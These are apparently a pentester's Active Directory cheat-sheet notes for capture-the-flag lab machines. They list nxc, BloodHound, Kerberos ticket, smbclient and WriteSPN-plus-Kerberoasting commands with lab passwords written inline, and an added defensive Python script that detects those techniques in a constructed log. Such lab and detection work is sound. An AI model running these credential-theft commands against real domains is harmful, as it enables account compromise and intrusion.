nxc
- Get SMB shares: `nxc smb <target domain name> -u <username> -p <password> --shares`
- Checking for certificates: `nxc ldap DC -u levi.james -p 'KingofAkron2025!' -M adcs`
- Kerberoasting: `nxc ldap DC -u levi.james -p 'KingofAkron2025!' --kerberoasting kerb.txt`
- bloodhound-ce-python: `bloodhound-ce-python --zip -dc DC.puppy.htb -u levi.james -p 'KingofAkron2025!' --auth-method ntlm -c all -d puppy.htb --dns-tcp -ns 10.10.11.70`
- rusthound-ce: `rusthound-ce -d DC.puppy.htb -u 'levi.james@puppy.htb' -p 'KingofAkron2025!' -z`
Kerberos Stuff
- Generate krb5 file: `nxc -k 10.10.11.69 -u "j.fleischman" -p "J0elTHEM4n1990!" --generate-krb5-file fluffy.krb5`
- Then put it into `/etc/krb5.conf` and then get a TGT: `getTGT.py fluffy.htb/j.fleischman:J0elTHEM4n1990!`
- And use `KRB5CCNAME` to log in via SSH with Kerberos: `KRB5CCNAME=f.frizzle.ccache ssh -K f.frizzle@frizzdc.frizz.htb -v`
smbclient (or impacket smbclient.py)
I usually use smbclient and that is what IppSec uses and I learnt it from there.
- smbclient: `smbclient //10.10.11.51/Accounting\ Department -U rose%KxEPkKe6R8su`
- smbclient with Kerberos: `smbclient --realm=voleur.htb //dc.voleur.htb/IT -U "voleur.htb/ryan.naylor%HollowOct31Nyt" -k`
WriteSPN
Source: BloodHound wiki: https://bloodhound.specterops.io/resources/edges/write-spn
- First set the "servicePrincipalName": `bloodyAD -d tombwatcher.htb -u henry -p H3nry_987TGV! --host 10.10.11.72 set object alfred servicePrincipalName -v "http/somethingafterhttp"`
- Then use nxc for Kerberoasting: `nxc ldap dc01.tombwatcher.htb -u henry -p H3nry_987TGV! -k --kerberoasting kerberoasting.hashes`
- Crack the hash using hashcat.
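From the defender's side, both the Kerberoasting entries in the nxc section and the WriteSPN sequence above leave a distinctive trail: a burst of RC4-encrypted service-ticket requests (Security event 4769, etype 0x17) from one account, and a servicePrincipalName modification on a user object (Security event 5136) by an account that normally has no business writing SPNs. The script below is an added example, not part of these notes or of any of the tools named here; it works on a constructed, simplified `<event_id> key=value` log format (real Windows events are XML), and the account and service names in it are made up.

```python
"""Detection helpers for the two techniques above: Kerberoasting (many RC4
service-ticket requests from one account) and WriteSPN abuse (a non-admin
writing servicePrincipalName on another user).

Added example, not from the original notes. The log format is constructed and
simplified; only the event ids (4769, 5136) and the RC4 etype (0x17) are real.
"""
from collections import defaultdict

RC4_HMAC = 0x17          # Kerberos etype 23; RC4 tickets are the usual Kerberoasting signal
DEFAULT_THRESHOLD = 5    # distinct SPNs requested with RC4 before we flag an account

# Constructed sample log: one record per line, "<event_id> key=value ...".
CONSTRUCTED_LOG = """\
4769 account=alice service=http/web01 etype=0x17
4769 account=alice service=mssql/sql01 etype=0x17
4769 account=alice service=cifs/files01 etype=0x17
4769 account=alice service=http/intranet etype=0x17
4769 account=alice service=ldap/dc01 etype=0x17
4769 account=alice service=host/app01 etype=0x17
4769 account=dave service=cifs/files01 etype=0x12
4769 account=dave service=http/web01 etype=0x12
5136 account=bob object=CN=carol,CN=Users,DC=example,DC=local attribute=servicePrincipalName
5136 account=bob object=CN=carol,CN=Users,DC=example,DC=local attribute=description
5136 account=svc_adconnect object=CN=carol,CN=Users,DC=example,DC=local attribute=servicePrincipalName
"""


def parse_line(line):
    """Turn '<event_id> k=v k=v ...' into a dict; the event id becomes an int.
    Values may themselves contain '=' (distinguished names), so split once only."""
    event_id, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["event_id"] = int(event_id)
    return fields


def parse_log(text):
    """Parse every non-empty line of the constructed log."""
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def kerberoast_suspects(events, threshold=DEFAULT_THRESHOLD):
    """Accounts that requested RC4 service tickets for >= threshold distinct SPNs.
    Returns {account: sorted list of services}. AES requests (0x12/0x11) are ignored."""
    per_account = defaultdict(set)
    for ev in events:
        if ev["event_id"] != 4769:
            continue
        if int(ev["etype"], 16) != RC4_HMAC:
            continue
        per_account[ev["account"]].add(ev["service"])
    return {acct: sorted(svcs) for acct, svcs in per_account.items()
            if len(svcs) >= threshold}


def suspicious_spn_writes(events, allowed_writers):
    """5136 events where servicePrincipalName was modified by an account outside
    the allow-list (e.g. provisioning or sync service accounts). Returns
    [(writer, object DN), ...] in log order."""
    hits = []
    for ev in events:
        if (ev["event_id"] == 5136
                and ev["attribute"] == "servicePrincipalName"
                and ev["account"] not in allowed_writers):
            hits.append((ev["account"], ev["object"]))
    return hits


if __name__ == "__main__":
    evs = parse_log(CONSTRUCTED_LOG)
    print("Kerberoasting suspects:", kerberoast_suspects(evs))
    print("Unexpected SPN writes:", suspicious_spn_writes(evs, allowed_writers={"svc_adconnect"}))
```

The threshold and the allow-list are the two knobs worth tuning per environment: a single RC4 request is common from legacy clients, but one account touching many unrelated SPNs in a short window is not, and SPN writes on user objects should come from a small, known set of accounts.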
Get/Restore Deleted Users
- Get deleted objects: `Get-ADObject -filter 'isDeleted -eq $true' -IncludeDeletedObjects`
- Get the GUID from above and restore it as: `Restore-ADObject -identity <GUID>`